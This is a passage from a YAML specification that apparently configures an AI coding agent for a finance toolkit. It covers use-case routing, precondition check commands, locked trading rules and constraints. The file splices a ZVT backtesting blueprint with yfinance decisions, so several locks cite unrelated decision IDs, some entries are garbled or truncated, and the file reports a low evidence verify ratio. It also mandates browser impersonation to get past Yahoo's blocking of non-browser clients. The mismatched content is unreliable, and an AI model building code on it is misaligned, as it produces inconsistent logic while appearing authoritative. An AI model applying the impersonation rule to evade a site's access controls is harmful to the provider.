        kind: required_method
        signature: ''
      - name: WebSocket.subscribe
        file: live_streaming_(websocket)/websocket-subscribe.py
        line: 0
        kind: required_method
        signature: ''
      - name: AsyncWebSocket.connect
        file: live_streaming_(websocket)/asyncwebsocket-connect.py
        line: 0
        kind: required_method
        signature: ''
      - name: websocket_url
        file: live_streaming_(websocket)/websocket-url.py
        line: 0
        kind: replaceable_point
      design_decision_count: 2
    caching_layer:
      class_count: 5
      stage_id: caching
      stage_order: 9
      responsibility: SQLite-based caching for timezone data, cookies, and ISIN lookups to reduce API calls and improve performance
        across sessions.
      classes:
      - name: _TzCache.get
        file: caching_layer/tzcache-get.py
        line: 0
        kind: required_method
        signature: ''
      - name: _TzCache.set
        file: caching_layer/tzcache-set.py
        line: 0
        kind: required_method
        signature: ''
      - name: _ISINCache.lookup
        file: caching_layer/isincache-lookup.py
        line: 0
        kind: required_method
        signature: ''
      - name: _CookieCache.get
        file: caching_layer/cookiecache-get.py
        line: 0
        kind: required_method
        signature: ''
      - name: cache_backend
        file: caching_layer/cache-backend.py
        line: 0
        kind: replaceable_point
      design_decision_count: 2
  data_flow_hints: []
locale_contract:
  source_language: en
  user_facing_fields:
  - human_summary.what_i_can_do.tagline
  - human_summary.what_i_can_do.use_cases[]
  - human_summary.what_i_auto_fetch[]
  - human_summary.what_i_ask_you[]
  - evidence_quality.user_disclosure_template
  - post_install_notice.message_template.positioning
  - post_install_notice.message_template.capability_catalog.groups[].name
  - post_install_notice.message_template.capability_catalog.groups[].description
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].name
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].short_description
  - post_install_notice.message_template.call_to_action
  - post_install_notice.message_template.featured_entries[].beginner_prompt
  - post_install_notice.message_template.more_info_hint
  - preconditions[].description
  - preconditions[].on_fail
  - intent_router.uc_entries[].name
  - intent_router.uc_entries[].ambiguity_question
  - architecture.pipeline
  - architecture.stages[].narrative.does_what
  - architecture.stages[].narrative.key_decisions
  - architecture.stages[].narrative.common_pitfalls
  - constraints.fatal[].consequence
  - constraints.regular[].consequence
  - output_validator.assertions[].failure_message
  - acceptance.hard_gates[].on_fail
  - skill_crystallization.action
  locale_detection_order:
  - explicit_user_declaration
  - first_message_language
  - system_locale
  translation_enforcement:
    trigger: on_first_user_message
    action: Render user_facing_fields in detected locale, preserving all IDs (BD-/SL-/UC-/finance-C-) and code identifiers
      verbatim
    violation_code: LOCALE-01
    violation_signal: User receives untranslated English Human Summary when detected locale != en
evidence_quality:
  declared:
    evidence_coverage_ratio: 1.0
    evidence_verify_ratio: 0.2978723404255319
    evidence_invalid: 33
    evidence_verified: 14
    evidence_auto_fixed: 0
    audit_coverage: 23/23 (100%)
    audit_pass_rate: 5/23 (21%)
    audit_fail_total: 3
    audit_finance_universal:
      pass: 1
      warn: 1
      fail: 1
    audit_subdomain_totals:
      pass: 4
      warn: 14
      fail: 2
  enforcement_rules:
  - id: EQ-01
    trigger: declared.evidence_verify_ratio < 0.5
    action: MUST invoke traceback lookup for all cited BD-IDs in output before emitting business code — read LATEST.yaml sections
      for each BD referenced
    violation_code: EQ-01-V
    violation_signal: Generated script references BD-IDs but no tool_call to read LATEST.yaml preceded code generation
  user_disclosure_template: '[QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-128. Evidence verify ratio
    = 29.8% and audit fail total = 3. Generated results may have uncaptured requirement gaps. Verify critical decisions against
    source files (LATEST.yaml / LATEST.jsonl).'
traceback:
  source_files:
    blueprint: LATEST.yaml
    constraints: LATEST.jsonl
  mandatory_lookup_scenarios:
  - id: TB-01
    condition: Two constraints have apparently conflicting enforcement rules
    lookup_target: LATEST.jsonl — find both constraint IDs, compare `consequence` + `evidence_refs` to determine priority
  - id: TB-02
    condition: A business decision rationale is unclear or disputed
    lookup_target: LATEST.yaml — locate BD-ID under business_decisions, read `rationale` + `alternative_considered` fields
  - id: TB-03
    condition: evidence_invalid > 0 in evidence_quality.declared
    lookup_target: LATEST.yaml _enrich_meta — cross-check specific BD `evidence_refs` fields for invalid markers
  - id: TB-04
    condition: User asks where a rule comes from
    lookup_target: LATEST.jsonl — find constraint by ID, read `confidence.evidence_refs` for source file + line number
  - id: TB-05
    condition: Generated code does not match expected ZVT API behavior
    lookup_target: LATEST.yaml stages[].required_methods — verify method signature and evidence locator in source code
  degraded_lookup:
    no_fs_access: 'Ask the user to paste the relevant LATEST.yaml section or LATEST.jsonl lines for the BD-/finance-C- IDs
      in question. Crystal ID: finance-bp-128-v5.0.'
trace_schema:
  event_types:
  - precondition_check
  - spec_lock_check
  - evidence_rule_fired
  - evidence_rule_skipped
  - locale_translation_emitted
  - hard_gate_passed
  - hard_gate_failed
  - skill_emitted
  - false_completion_claim
preconditions:
- id: PC-01
  description: zvt package installed and importable
  check_command: python3 -c 'import zvt; print(zvt.__version__)'
  on_fail: 'Run: python3 -m pip install zvt  then re-run: python3 -m zvt.init_dirs to initialize data directories'
  severity: fatal
- id: PC-02
  description: K-data exists for target entities (required before backtesting)
  check_command: python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1);
    assert df is not None and len(df) > 0, 'No kdata found'"
  on_fail: 'Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000  (replace
    with your target entity IDs)'
  severity: fatal
  applies_to_uc: []
- id: PC-03
  description: ZVT data directory initialized (~/.zvt or ZVT_HOME)
  check_command: 'python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get(''ZVT_HOME'', Path.home()
    / ''.zvt'')); assert zvt_home.exists(), f''ZVT home not found: {zvt_home}''"'
  on_fail: 'Run: python3 -m zvt.init_dirs'
  severity: fatal
- id: PC-04
  description: SQLite write permission for ZVT data directory
  check_command: python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home()
    / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"
  on_fail: 'Check directory permissions: chmod u+w ~/.zvt  or set ZVT_HOME environment variable to a writable location'
  severity: warn
intent_router:
  uc_entries:
  - uc_id: UC-101
    name: Utility Function Validation
    positive_terms:
    - timezone
    - datetime
    - validation
    - parse
    - utility
    data_domain: mixed
    negative_terms:
    - price
    - ticker
    - search
    - screen
    - earnings
    ambiguity_question: Are you looking for date/timezone parsing utilities or financial data retrieval (prices, search, screening)?
  - uc_id: UC-102
    name: Stock Screener Query Execution
    positive_terms:
    - screen
    - filter
    - query
    - criteria
    - find stocks
    data_domain: financial_data
    negative_terms:
    - historical prices
    - ticker info
    - calendar
    - search symbol
    ambiguity_question: Do you want to screen stocks by criteria (e.g., price > $5) or search for specific ticker symbols?
  - uc_id: UC-103
    name: Ticker Symbol Search
    positive_terms:
    - search
    - find ticker
    - symbol lookup
    - company name
    - fuzzy
    data_domain: financial_data
    negative_terms:
    - price history
    - screening
    - earnings
    - live data
    ambiguity_question: Are you searching for a ticker symbol by company name, or do you need historical price data for a
      known ticker?
  - uc_id: UC-104
    name: Financial Calendar Retrieval
    positive_terms:
    - earnings calendar
    - IPO
    - upcoming events
    - corporate events
    - dates
    data_domain: financial_data
    negative_terms:
    - price history
    - screening
    - search
    - live trading
    ambiguity_question: Do you need to track upcoming earnings/IPO dates, or are you looking for historical price data?
  - uc_id: UC-105
    name: Historical Price Data Retrieval
    positive_terms:
    - price history
    - historical data
    - OHLCV
    - download
    - chart data
    data_domain: market_data
    negative_terms:
    - screening
    - search
    - ticker info
    - earnings calendar
    ambiguity_question: Do you need historical price/volume data for analysis or charting, or are you looking for other financial
      data (earnings, info)?
  - uc_id: UC-106
    name: Ticker Information and Metadata
    positive_terms:
    - ticker info
    - metadata
    - holders
    - recommendations
    - splits
    data_domain: financial_data
    negative_terms:
    - price history
    - screening
    - search
    - calendar
    ambiguity_question: Do you need detailed ticker metadata (info, holders, splits) or historical price/volume data?
  - uc_id: UC-107
    name: Price Data Repair and Resampling
    positive_terms:
    - repair
    - fix data
    - resample
    - corrupt
    - clean data
    data_domain: market_data
    negative_terms:
    - ticker info
    - search
    - screening
    - live data
    ambiguity_question: Are you trying to fix corrupted price data, or do you need to retrieve or analyze existing price data?
  - uc_id: UC-108
    name: Live Cryptocurrency Price Streaming
    positive_terms:
    - live
    - real-time
    - stream
    - websocket
    - crypto
    data_domain: market_data
    negative_terms:
    - historical
    - batch download
    - screening
    - search
    ambiguity_question: Do you need real-time streaming data for live trading, or historical price data for analysis?
  - uc_id: UC-109
    name: Cache Fallback on Read-Only Filesystem
    positive_terms:
    - cache
    - permissions
    - fallback
    - timezone storage
    - restricted
    data_domain: mixed
    negative_terms:
    - price data
    - search
    - screening
    - ticker info
    ambiguity_question: Are you experiencing cache/write permission issues, or do you need to retrieve financial data?
  - uc_id: UC-110
    name: Concurrent Multi-Ticker Download
    positive_terms:
    - concurrent
    - thread-safe
    - multi-ticker
    - parallel
    - batch download
    data_domain: market_data
    negative_terms:
    - single ticker
    - live streaming
    - screening
    - search
    ambiguity_question: Do you need to download data for multiple tickers simultaneously, or just a single ticker?
  - uc_id: UC-111
    name: Securities Symbol Lookup by Type
    positive_terms:
    - lookup
    - ETF
    - mutual fund
    - index
    - security type
    data_domain: financial_data
    negative_terms:
    - price history
    - screening
    - earnings
    - live data
    ambiguity_question: Do you need to find a specific type of security (ETF, mutual fund, index), or other financial data?
  - uc_id: UC-112
    name: Timezone Cache Storage
    positive_terms:
    - cache
    - timezone
    - storage
    - performance
    - optimize
    data_domain: mixed
    negative_terms:
    - price data
    - search
    - screening
    - ticker info
    ambiguity_question: Are you looking to optimize performance with caching, or do you need to retrieve financial data?
context_state_machine:
  states:
  - id: CA1_MEMORY_CHECKED
    entry: Task started
    exit: All memory queries attempted and recorded; memory_unavailable set if failed
    timeout: 30s — skip memory, mark memory_unavailable=true, proceed to CA2
  - id: CA2_GAPS_FILLED
    entry: CA1 complete
    exit: 'All FATAL-priority required inputs answered: target market (A-share/HK/US), data source, time range, strategy type'
    timeout: NOT skippable — FATAL inputs MUST be user-answered before proceeding
  - id: CA3_PATH_SELECTED
    entry: CA2 complete
    exit: intent_router matched single use case with confidence gap > 20% over next candidate, no data_domain ambiguity
    timeout: Trigger ambiguity_question for top-2 candidates, await user selection
  - id: CA4_EXECUTING
    entry: CA3 complete + user explicit confirmation received
    exit: All hard gates G1-Gn passed and output files written
    timeout: NOT skippable — user confirmation of execution path required
  enforcement: Code generation is PROHIBITED before CA4_EXECUTING. Any regression to earlier state MUST be announced to user.
    buy/sell ordering SL-01 check runs at CA4 entry.
spec_lock_registry:
  semantic_locks:
  - id: SL-01
    description: Execute sell orders before buy orders in every trading cycle
    locked_value: sell() called before buy() in each Trader.run() iteration
    violation_is: fatal
    source_bd_ids:
    - BD-018
  - id: SL-02
    description: Trading signals MUST use next-bar execution (no look-ahead)
    locked_value: due_timestamp = happen_timestamp + level.to_second()
    violation_is: fatal
    source_bd_ids:
    - BD-014
    - BD-025
  - id: SL-03
    description: Entity IDs MUST follow format entity_type_exchange_code
    locked_value: stock_sh_600000 | stockhk_hk_0700 | stockus_nasdaq_AAPL
    violation_is: fatal
    source_bd_ids: []
  - id: SL-04
    description: DataFrame index MUST be MultiIndex (entity_id, timestamp)
    locked_value: df.index.names == ['entity_id', 'timestamp']
    violation_is: fatal
    source_bd_ids: []
  - id: SL-05
    description: 'TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount'
    locked_value: XOR enforcement in trading/__init__.py:68
    violation_is: fatal
    source_bd_ids: []
  - id: SL-06
    description: 'filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION'
    locked_value: factor.py:475 order_type_flag mapping
    violation_is: fatal
    source_bd_ids: []
  - id: SL-07
    description: Transformer MUST run BEFORE Accumulator in factor pipeline
    locked_value: 'compute_result(): transform at :403 before accumulator at :409'
    violation_is: fatal
    source_bd_ids: []
  - id: SL-08
    description: 'MACD parameters locked: fast=12, slow=26, signal=9'
    locked_value: factors/algorithm.py:30 macd(slow=26, fast=12, n=9)
    violation_is: fatal
    source_bd_ids:
    - BD-036
  - id: SL-09
    description: 'Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001'
    locked_value: sim_account.py:25 SimAccountService default costs
    violation_is: warning
    source_bd_ids:
    - BD-029
  - id: SL-10
    description: A-share equity trading is T+1 (no same-day close of buy positions)
    locked_value: sim_account.available_long filters by trading_t
    violation_is: fatal
    source_bd_ids: []
  - id: SL-11
    description: Recorder subclass MUST define provider AND data_schema class attributes
    locked_value: contract/recorder.py:71 Meta; register_schema decorator
    violation_is: fatal
    source_bd_ids: []
  - id: SL-12
    description: Factor result_df MUST contain either 'filter_result' OR 'score_result' column
    locked_value: result_df.columns.intersection({'filter_result', 'score_result'}) non-empty
    violation_is: fatal
    source_bd_ids: []
  implementation_hints:
  - id: IH-01
    hint: 'Use AdjustType enum exactly: qfq (pre-adjust), hfq (post-adjust), bfq (none) — contract/__init__.py:121'
  - id: IH-02
    hint: For A-share kdata, default to hfq for long-term analysis (dividend-adjusted) — trader.py:538 StockTrader
  - id: IH-03
    hint: SQLite connection MUST use check_same_thread=False for multi-threaded recorders
  - id: IH-04
    hint: Accumulator state serialization uses JSON with custom encoder/decoder hooks — contract/base_service.py
  - id: IH-05
    hint: Factor.level MUST match TargetSelector.level (enforced at add_factor) — factors/target_selector.py:84
preservation_manifest:
  required_objects:
    business_decisions_count: 60
    fatal_constraints_count: 31
    non_fatal_constraints_count: 188
    use_cases_count: 12
    semantic_locks_count: 12
    preconditions_count: 4
    evidence_quality_rules_count: 2
    traceback_scenarios_count: 5
architecture:
  pipeline: data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization
  stages:
  - id: data_collection
    narrative:
      does_what: TimeSeriesDataRecorder and FixedCycleDataRecorder fetch OHLCV and fundamental data from providers (eastmoney,
        joinquant, baostock, akshare) and persist domain objects (Stock1dKdata, BalanceSheet) to SQLite via df_to_db().
      key_decisions: BD-002 chose evaluate_start_end_size_timestamps for incremental fetch (not full refresh) because comparing
        to get_latest_saved_record avoids redundant API calls; BD-003 chose get_data_map field transformation to keep domain
        schema provider-agnostic.
      common_pitfalls: 'Don''t forget SL-11: Recorder subclass MUST declare both provider and data_schema class attributes
        else initialization fails with assertion error; finance-C-001 fatal violation.'
    business_decisions: []
  - id: data_storage
    narrative:
      does_what: StorageBackend persists DataFrames to per-provider SQLite databases at {data_path}/{provider}/{provider}_{db_name}.db
        using path templates from _get_path_template; Mixin.record_data and Mixin.query_data provide uniform read/write interface.
      key_decisions: BD-004 chose StorageBackend abstraction (not hardcoded SQLite) to allow future cloud storage swap; BD-006
        derives db_name from data_schema __tablename__ for per-domain database isolation.
      common_pitfalls: SL-04 violation (wrong DataFrame index) causes factor pipeline failures downstream; always ensure df.index.names
        == ['entity_id', 'timestamp'] before calling record_data.
    business_decisions: []
  - id: factor_computation
    narrative:
      does_what: Factor.compute() applies Transformer (stateless, e.g. MacdTransformer) then Accumulator (stateful, e.g. MaStatsAccumulator)
        to produce filter_result or score_result columns; EntityStateService persists per-entity rolling state across batches.
      key_decisions: BD-007 chose Factor inheriting DataReader for composable data access; SL-08 locks MACD at (fast=12, slow=26,
        n=9) — chose standard Appel parameters not adaptive because interpretability matters for practitioners.
      common_pitfalls: 'SL-07: Transformer MUST run before Accumulator — swapping order causes NaN propagation; SL-12: result_df
        must contain filter_result OR score_result column or TargetSelector silently drops all signals.'
    business_decisions: []
  - id: target_selection
    narrative:
      does_what: TargetSelector.add_factor() registers Factor instances; get_targets() returns entity_ids passing threshold
        filter at a specific timestamp, enabling point-in-time historical backtesting without look-ahead.
      key_decisions: BD-012 chose registrable factor list (not hardcoded) for runtime customization; BD-013 chose timestamp-specific
        filtering not current-only because backtests need historical point-in-time correctness.
      common_pitfalls: Factor.level MUST match TargetSelector.level (IH-05); mismatched levels cause silent empty target lists
        that look like no signals but are actually level-mismatch bugs.
    business_decisions: []
  - id: trading_execution
    narrative:
      does_what: Trader.run() calls sell() before buy() each cycle, generates TradingSignals with due_timestamp = happen_timestamp
        + level.to_second() for next-bar execution, and applies on_profit_control() for stop-loss/take-profit before regular
        target selection.
      key_decisions: SL-01 locks sell-before-buy order because available_long check in sim_account depends on it — chose this
        over symmetric ordering to prevent implicit leverage; BD-039 chose long=AND/short=OR multi-level logic to reflect
        risk asymmetry.
      common_pitfalls: 'SL-02 violation (immediate execution instead of next-bar) introduces look-ahead bias and makes backtest
        results unreproducible in live trading; SL-10: A-share T+1 constraint — backtesting without it overstates returns.'
    business_decisions: []
  - id: visualization
    narrative:
      does_what: Drawer.draw() combines kline main chart with factor overlays and Rect annotations for entry/exit signals
        using Plotly; Drawable interface on Factor enables consistent chart rendering across data types.
      key_decisions: BD-019 chose drawer_rects subclass override for custom annotations not hardcoded markers — allows traders
        to define entry/exit visuals without modifying base drawing logic.
      common_pitfalls: draw_result=True by default (BD-055) is fine for development but set draw_result=False in production/headless
        environments to avoid Plotly server startup overhead.
    business_decisions: []
  - id: cross_cutting_concerns
    narrative:
      does_what: 'Invariants and utilities that span multiple pipeline stages — collected from 20 source groups: API Design(2),
        Architecture(1), Documentation(1), batch_download(3), caching(2), default_value(2), and 14 more.'
      key_decisions: 60 BDs merged here because they apply to more than one main stage (e.g. algorithm helpers, default value
        choices, ordering contracts, error handling). Agent should inspect individual BD summaries and link back to affected
        main stages via shared IDs.
      common_pitfalls: Cross-cutting concerns frequently surface as bugs when changes to one main stage unintentionally break
        another. Check constraints referencing these BDs and verify invariants still hold after any stage-local modification.
    business_decisions:
    - id: BD-GAP-001
      type: T/BA
      summary: Library provides separate async and sync callback patterns for live data handling, enabling use in both concurrent
        async frameworks and traditional synchronous applications
    - id: BD-GAP-002
      type: BA
      summary: Message handlers use simple single-parameter callback signature (message) rather than structured context/environment
        objects
    - id: BD-GAP-003
      type: BA
      summary: Examples demonstrate standalone functions for message handling instead of class-based observers or strategy
        pattern
    - id: BD-GAP-004
      type: DK/B
      summary: Most example files (tickers.py, market.py, proxy.py, sector_industry.py, download.py, lookup.py, search.py,
        sector_industry_ticker.py, ticker.py, funds_data.py, calendars.py) are empty stubs with no i
    - id: BD-014
      type: B/BA
      summary: Multithreading enabled by default
    - id: BD-015
      type: M
      summary: DEBUG logging disables threads
    - id: BD-016
      type: M/BA
      summary: ignore_tz default based on interval
    - id: BD-023
      type: B/BA
      summary: Dummy cache fallback
    - id: BD-024
      type: M/DK
      summary: Peewee ORM for SQLite
    - id: BD-040
      type: BA/DK
      summary: debug.hide_exceptions=True by default - errors silently swallowed unless debug.logging is enabled
    - id: BD-042
      type: BA
      summary: actions=False in download() but actions=True in Ticker.history() - inconsistent default across APIs
    - id: BD-017
      type: B/DK
      summary: Abstract base class pattern
    - id: BD-018
      type: BA
      summary: SECTOR_INDUSTRY_MAPPING in const.py
    - id: BD-044
      type: B/BA
      summary: 'INTERACTION: [BD-003] × [BD-005] → Silent data corruption amplified by default behavior'
    - id: BD-045
      type: BA
      summary: 'INTERACTION: [BD-055] × [BD-057] → Contradiction: silent failures hide API inconsistency consequences'
    - id: BD-046
      type: B/BA
      summary: 'INTERACTION: [BD-053] → [BD-054] → Hidden dependency of multiday interval fallback on pipeline ordering'
    - id: BD-047
      type: BA
      summary: 'INTERACTION: [BD-002] × [BD-055] × [BD-057] → Risk cascade: silent failures obscure multiple failure modes'
    - id: BD-048
      type: B/BA
      summary: 'INTERACTION: [BD-026] × [BD-027] × [BD-044] → Amplification: 100x unit error detection fails when rounding
        misaligns with multiplier'
    - id: BD-049
      type: M
      summary: 'INTERACTION: [BD-006] × [BD-035] → Redundant depth limits creating potential inconsistent enforcement'
    - id: BD-050
      type: B/BA
      summary: 'INTERACTION: [BD-046] × [BD-047] → Contradiction: linear ratio and backward adjustment produce different historical
        prices'
    - id: BD-051
      type: B/BA
      summary: 'INTERACTION: [BD-030] × [BD-032] × [BD-043] → Risk cascade: multiple dividend thresholds create conflicting
        flag conditions'
    - id: BD-001
      type: B
      summary: Singleton pattern for YfData
    - id: BD-002
      type: BA
      summary: hide_exceptions=True default
    - id: BD-003
      type: B
      summary: curl_cffi impersonate=chrome
    - id: BD-GAP-005
      type: RC
      summary: 'Missing: float vs Decimal for currency'
    - id: BD-GAP-006
      type: DK
      summary: 'Missing: Random seed full coverage'
    - id: BD-GAP-007
      type: B
      summary: 'Missing: 3'
    - id: BD-GAP-008
      type: DK
      summary: 'Missing: Random seed full coverage'
    - id: BD-GAP-009
      type: B
      summary: 'Missing: 3'
    - id: BD-041
      type: B/BA
      summary: Capital gains double-counting detection - Yahoo pre-adds CG to dividends column, breaking Adj Close calculation
    - id: BD-043
      type: B/BA
      summary: FX ticker suffix =X triggers special handling - volume always 0 and different validation logic
    - id: BD-021
      type: B
      summary: Separate sync/async classes
    - id: BD-022
      type: B/RC
      summary: Protobuf message decoding
    - id: BD-038
      type: B/BA
      summary: 'Price repair pipeline MUST execute in specific order: standardize_currency → div_adjust → unit_mixups → stock_splits
        → capital_gains → auto_adjust'
    - id: BD-039
      type: B
      summary: When repair=True with multiday intervals (1wk,1mo,3mo), code auto-fetches 1d then resamples - documented as
        'solves Yahoo's flawed div-adjusting'
    - id: BD-025
      type: B
      summary: Fundamentals financials, earnings, shares as separate properties
    - id: BD-004
      type: B/BA
      summary: Lazy loading PriceHistory
    - id: BD-005
      type: BA
      summary: repair=False default
    - id: BD-006
      type: M
      summary: Multi-interval reconstruction with max depth=2
    - id: BD-007
      type: M
      summary: Sentinel value tag=-1.0 for repair
    - id: BD-008
      type: BA
      summary: scipy only imported if repair=True
    - id: BD-009
      type: B
      summary: Separate scraper classes per domain
    - id: BD-010
      type: B
      summary: FastInfo lazy metadata fetching
    - id: BD-026
      type: B/BA
      summary: 5% price change threshold for interday volume repair
    - id: BD-027
      type: B/BA
      summary: 8% ratio threshold for phantom dividend detection
    - id: BD-028
      type: B/BA
      summary: 66.6% double-count threshold for capital gains repair
    - id: BD-029
      type: B/BA
      summary: 1x improvement threshold for dividend-too-small detection
    - id: BD-030
      type: B/BA
      summary: 2x improvement threshold for dividend-too-big detection
    - id: BD-031
      type: B/BA
      summary: 14-day lookback for dividend adjustment validation
    - id: BD-034
      type: B/BA
      summary: 1.5x drop ratio to identify phantom dividend
    - id: BD-019
      type: B
      summary: Operator pattern for queries
    - id: BD-020
      type: B
      summary: Abstract base class with @abstractmethod
    - id: BD-035
      type: B/BA
      summary: 1% relative tolerance for price repair test validation
    - id: BD-036
      type: B/BA
      summary: 1e-7 relative tolerance for zero repair test validation
    - id: BD-037
      type: B/BA
      summary: -32% volume match tolerance for resampling test
    - id: BD-011
      type: M/DK
      summary: MIC code tuple support
    - id: BD-012
      type: B
      summary: ISIN lookup caching
    - id: BD-013
      type: BA
      summary: Alias methods (e.g., incomestmt->income_stmt)
    - id: BD-032
      type: B/BA
      summary: Linear ratio adjustment for auto_adjust mode
    - id: BD-033
      type: B/BA
      summary: Backward adjustment preserving historical price levels
resources:
  packages:
  - name: pandas>=1.3.0
    version_pin: latest
  - name: numpy>=1.16.5
    version_pin: latest
  - name: requests>=2.31
    version_pin: latest
  - name: multitasking>=0.0.7
    version_pin: latest
  - name: platformdirs>=2.0.0
    version_pin: latest
  - name: pytz>=2022.5
    version_pin: latest
  - name: frozendict>=2.3.4
    version_pin: latest
  - name: peewee>=3.16.2
    version_pin: latest
  - name: beautifulsoup4>=4.11.1
    version_pin: latest
  - name: curl_cffi>=0.15
    version_pin: latest
  strategy_scaffold:
    entry_point_name: run_backtest
    output_path: result.csv
    execution_mode: backtest
    conditional_entry_points:
      backtest:
        entry_point_name: run_backtest
        output_path: result.csv
      collector:
        entry_point_name: run_collector
        output_path: result.json
      factor:
        entry_point_name: run_factor
        output_path: result.parquet
      training:
        entry_point_name: run_training
        output_path: result.json
      serving:
        entry_point_name: run_server
        output_path: result.json
      research:
        entry_point_name: run_research
        output_path: result.json
    tail_template: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()  #\
      \ implement above\n    from validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\"\
      )\n# === END DO NOT MODIFY ==="
  host_adapter:
    target: openclaw
    timeout_seconds: 1800
    shell_operator_restriction: 'exec tool intercepts && / ; / | — never chain: ''pip install X && python Y''. Use separate
      exec calls.'
    install_recipes:
    - python3 -m pip install pandas>=1.3.0
    - python3 -m pip install numpy>=1.16.5
    - python3 -m pip install requests>=2.31
    - python3 -m pip install zvt
    credential_injection: JoinQuant/QMT credentials require user-side '!' prefix shell login. Never hardcode credentials in
      generated scripts.
    path_resolution: '{workspace} resolves to ~/.openclaw/workspace/doramagic at execution time.'
    file_io_tooling: Use openclaw 'write' tool for .py/.sql files; 'exec' tool for python3 /absolute/path/script.py (absolute
      paths only).
constraints:
  fatal:
  - id: finance-C-001
    when: When implementing HTTP session initialization for Yahoo API
    action: Use curl_cffi.requests.Session with impersonate='chrome'
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Yahoo's non-browser client blocking detects and rejects requests from standard HTTP libraries, resulting
      in 403 Forbidden errors and complete data access failure
    stage_ids:
    - http_layer
  - id: finance-C-002
    when: When handling HTTP request errors for Yahoo API
    action: Retry only transient errors (TimeoutError, socket.error, OSError, ConnectionError) and raise for permanent errors
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Retrying permanent errors like ValueError or KeyError wastes resources and masks underlying code bugs instead
      of surfacing them for proper debugging
    stage_ids:
    - http_layer
  - id: finance-C-004
    when: When making HTTP requests to Yahoo API endpoints
    action: Include crumb and cookie authentication with every request
    severity: fatal
    kind: architecture_guardrail
    modality: must
    consequence: Without proper crumb authentication, Yahoo API returns 401 Unauthorized or HTML error pages instead of JSON
      data, breaking all downstream data processing
    stage_ids:
    - http_layer
  - id: finance-C-007
    when: When accessing Yahoo Finance API
    action: Claim affiliation or endorsement from Yahoo, Inc.
    severity: fatal
    kind: claim_boundary
    modality: must_not
    consequence: Misrepresenting affiliation with Yahoo violates their terms of service and exposes users to legal liability
      for trademark infringement
    stage_ids:
    - http_layer
  - id: finance-C-009
    when: When setting up HTTP session with curl_cffi
    action: Use requests_cache or requests_ratelimiter session wrappers
    severity: fatal
    kind: resource_boundary
    modality: must_not
    consequence: requests_cache and requests_ratelimiter are incompatible with curl_cffi (which is required for Yahoo API),
      causing YFDataException crashes when attempting to use them
    stage_ids:
    - http_layer
  - id: finance-C-015
    when: When making direct HTTP calls bypassing YfData
    action: Bypass YfData singleton's cookie and crumb management
    severity: fatal
    kind: architecture_guardrail
    modality: must_not
    consequence: Direct HTTP calls without crumb authentication fail with 401/403 errors, breaking data access and causing
      confusion about whether Yahoo is blocking access
    stage_ids:
    - http_layer
  - id: finance-C-017
    when: When returning price history DataFrame
    action: Return DataFrame with timezone-aware DatetimeIndex by localizing to exchange timezone
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Timezone-naive index causes incorrect timestamp interpretation when combining with other timezone-aware data,
      leading to 23-25 hour offset errors during DST transitions
    stage_ids:
    - price_history
  - id: finance-C-019
    when: When initializing PriceHistory class
    action: Require non-None timezone parameter passed to constructor for data localization
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: Missing timezone causes YFTzMissingError exception and returns empty DataFrame, breaking all downstream price
      calculations
    stage_ids:
    - price_history
  - id: finance-C-021
    when: When repairing prices with repair=True
    action: Use repair=True with interval='5d' because Yahoo's 5-day interval is fundamentally broken
    severity: fatal
    kind: resource_boundary
    modality: must_not
    consequence: Using repair=True with 5d interval causes ValueError crash due to nonsensical Yahoo 5d data structure
    stage_ids:
    - price_history
  - id: finance-C-022
    when: When repairing multi-day intervals (1wk, 1mo, 3mo) with repair=True
    action: Fetch 1d interval data first, apply repairs, then resample to target interval
    severity: fatal
    kind: resource_boundary
    modality: must
    consequence: Direct repair of multi-day intervals fails because Yahoo's multi-day adjustment logic is fundamentally broken,
      producing incorrect adjusted prices
    stage_ids:
    - price_history
  - id: finance-C-023
    when: When repairing prices with repair=True
    action: Exceed max reconstruction depth of 2 levels to prevent infinite recursion
    severity: fatal
    kind: resource_boundary
    modality: must_not
    consequence: Exceeding depth 2 causes infinite recursion and stack overflow when attempting to reconstruct prices from
      finer intervals
    stage_ids:
    - price_history
  - id: finance-C-030
    when: When repairing prices with repair=True
    action: 'Execute repair pipeline in strict order: currency standardization, bad dividend adjust, zeroes fix, unit mixups,
      bad splits, capital gains'
    severity: fatal
    kind: architecture_guardrail
    modality: must
    consequence: 'Incorrect repair order causes cascading errors: bad Adj Close corrupts 100x/split detection, and unit mixups
      corrupt dividend calculations'
    stage_ids:
    - price_history
  - id: finance-C-034
    when: When using yfinance to make claims about data accuracy
    action: Claim affiliation with Yahoo, Inc. since yfinance is an independent open-source project
    severity: fatal
    kind: claim_boundary
    modality: must_not
    consequence: Falsely claiming Yahoo affiliation violates trademark rights and could lead to legal action
    stage_ids:
    - price_history
  - id: finance-C-035
    when: When presenting yfinance data to end users
    action: Claim data is suitable for real-time trading since Yahoo Finance has ~15-30 minute delay
    severity: fatal
    kind: claim_boundary
    modality: must_not
    consequence: Users relying on delayed data for real-time trading suffer financial losses from stale quotes
    stage_ids:
    - price_history
  - id: finance-C-036
    when: When using yfinance data for backtesting
    action: Present backtest returns as guaranteed future returns since past performance does not predict future results
    severity: fatal
    kind: claim_boundary
    modality: must_not
    consequence: Investors making decisions based on backtest projections may experience significant financial losses when
      live trading differs from historical simulation
    stage_ids:
    - price_history
  - id: finance-C-063
    when: When initializing a Ticker with a (symbol, MIC) tuple
    action: validate that the tuple contains exactly 2 elements
    severity: fatal
    kind: domain_rule
    modality: must
